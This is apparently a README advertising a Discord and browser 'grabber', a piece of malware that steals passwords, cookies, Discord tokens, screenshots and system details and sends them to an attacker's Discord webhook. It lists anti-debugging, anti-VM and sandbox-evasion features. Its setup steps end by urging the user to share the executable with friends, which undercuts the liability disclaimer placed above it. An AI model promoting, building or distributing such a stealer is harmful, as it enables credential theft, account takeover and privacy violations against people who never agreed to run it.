Advanced grabber that grabs browser passwords, cookies, and Discord tokens with the computer information
- Protection (AntiDebug, AntiEmulation, AntiWebSniffers, AntiVM, AntiSandboxie) is controlled through the settings file.
- Discord webhooks integration.
- Grabs tokens from all installed clients even if the primary path changed and deletes accounts duplicates.
- Grabs PC information + token information.
- Shows top ten rarest friends.
- Grabs Discord password and sends the new info with every event that involves a password.
- Sends screenshot of all screens at the moment of the grabbing.
- Grabs browser cookies and passwords.
- Supports many Chromium-based & Gecko-based browsers. [Password & Cookies].
- Self-updating, When a new account is logged or a password changed, the grabber will send it again with the latest information.
- Bypasses Anti-Token-Grabbers.
The author does not hold any responsibility for the harmful use of this tool; remember that attacking targets without prior consent is illegal and punished by law.
- discord app must be open while running the program for the grabber to work!
download the zip
extract the folder
run Setup.exe
paste your webhook
share the executable with your friends!
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